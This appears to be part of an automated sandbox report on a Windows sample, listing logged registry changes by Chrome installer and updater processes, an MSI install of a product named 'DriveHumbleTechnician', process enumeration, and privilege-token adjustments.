Key created \REGISTRY\USER\.DEFAULT\SOFTWARE C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Google\Chrome\PreferenceMACs\Default\prefs.preference_reset_time = "6C056523881962FA60C39DC586EC88672E3DBD75C7CEEB8D31E9A1D9E0BF85EE" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B16B5A0E-3B72-5223-8DF0-9117CD64DE77}\TypeLib\Version = "1.0" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F63F6F8B-ACD5-413C-A44B-0409136D26CB}\1.0\0\win32\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\6" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\TypeLib\Version = "1.0" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{27634814-8E41-4C35-8577-980134A96544}\1.0\0 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.webp\OpenWithProgids C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\LocalService = "GoogleUpdaterService128.0.6597.0" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{ACAB122B-29C0-56A9-8145-AFA2F82A547C} C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964}\1.0\ = "GoogleUpdater TypeLib for IProcessLauncher" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{18D0F672-18B4-48E6-AD36-6E6BF01DBBC4}\TypeLib\ = "{18D0F672-18B4-48E6-AD36-6E6BF01DBBC4}" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\1.0\0\win32 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\1.0\0\win64 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CCA9FC90-B200-5641-99C0-7907756A93CF}\TypeLib\Version = "1.0" C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{F4334319-8210-469B-8262-DD03623FEB5B}\ProxyStubClsid32 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6430040A-5EBD-4E63-A56F-C71D5990F827}\TypeLib\ = "{6430040A-5EBD-4E63-A56F-C71D5990F827}" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{247954F9-9EDC-4E68-8CC3-150C2B89EADF}\1.0\0\win32 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1F1289FD-DD10-4579-81F6-1C59AAF2E1A9}\1.0\0\win32\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\6" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{699F07AD-304C-5F71-A2DA-ABD765965B54}\1.0\0\win64 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{0486745C-8D9B-5377-A54C-A61FFAA0BBE4}\TypeLib C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{D576ED7F-31DA-4EE1-98CE-1F882FB3047A} C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{B685B009-DBC4-4F24-9542-A162C3793E77} C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6430040A-5EBD-4E63-A56F-C71D5990F827}\1.0\ = "GoogleUpdater TypeLib for IProcessLauncher2System" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\1.0\0\win64 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{8A4B5D74-8832-5170-AB03-2415833EC703}\1.0\0\win64\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\5" C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34527502-D3DB-4205-A69B-789B27EE0414}\1.0\0\win64\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\6" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\TypeLib\Version = "1.0" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\ChromePDF C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{8A4B5D74-8832-5170-AB03-2415833EC703} C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\GoogleUpdate.Update3WebMachine C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{1F1289FD-DD10-4579-81F6-1C59AAF2E1A9}\TypeLib C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\ProductName = "DriveHumbleTechnician" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{E9CD91E3-A00C-4B9E-BD63-7F34EB815D98}\TypeLib C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4DC034A8-4BFC-4D43-9250-914163356BB0}\1.0\0\win32\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\6" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\TypeLib\Version = "1.0" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{699F07AD-304C-5F71-A2DA-ABD765965B54}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{247954F9-9EDC-4E68-8CC3-150C2B89EADF} C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F4334319-8210-469B-8262-DD03623FEB5B}\TypeLib\Version = "1.0" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{1588C1A8-27D9-563E-9641-8D20767FB258} C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{ACAB122B-29C0-56A9-8145-AFA2F82A547C}\ProxyStubClsid32 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{463ABECF-410D-407F-8AF5-0DF35A005CC8}\ProxyStubClsid32 C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{534F5323-3569-4F42-919D-1E1CF93E5BF6}\LocalService = "GoogleUpdaterService128.0.6597.0" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{534F5323-3569-4F42-919D-1E1CF93E5BF6}\ProgID C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\ = "IAppVersionWeb" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6430040A-5EBD-4E63-A56F-C71D5990F827}\1.0\0\win32\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\6" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\1.0\ = "GoogleUpdater TypeLib for IGoogleUpdate3Web" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{34527502-D3DB-4205-A69B-789B27EE0414}\TypeLib\ = "{34527502-D3DB-4205-A69B-789B27EE0414}" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{85AE4AE3-8530-516B-8BE4-A456BF2637D3}\1.0\ = "GoogleUpdater TypeLib for ICompleteStatusSystem" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{27634814-8E41-4C35-8577-980134A96544}\TypeLib C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E9CD91E3-A00C-4B9E-BD63-7F34EB815D98}\TypeLib\Version = "1.0" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D576ED7F-31DA-4EE1-98CE-1F882FB3047A}\ = "IAppWebSystem" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F966A529-43C6-4710-8FF4-0B456324C8F4}\1.0\0\win32\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\6" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{4DC034A8-4BFC-4D43-9250-914163356BB0}\1.0\0\win64 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\ChromeHTML\shell C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Interface\{CCA9FC90-B200-5641-99C0-7907756A93CF} C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{8018F647-BF07-55BB-82BE-A2D7049F7CE4} C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{18D0F672-18B4-48E6-AD36-6E6BF01DBBC4}\ProxyStubClsid32 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.html\OpenWithProgIds\ChromeHTML C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\1.0\0 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{34527502-D3DB-4205-A69B-789B27EE0414}\1.0\0 C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\ChromeHTML\Application C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
N/A N/A C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
N/A N/A C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
N/A N/A C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
N/A N/A C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
N/A N/A C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\srtasks.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Token: 35 N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Token: 35 N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
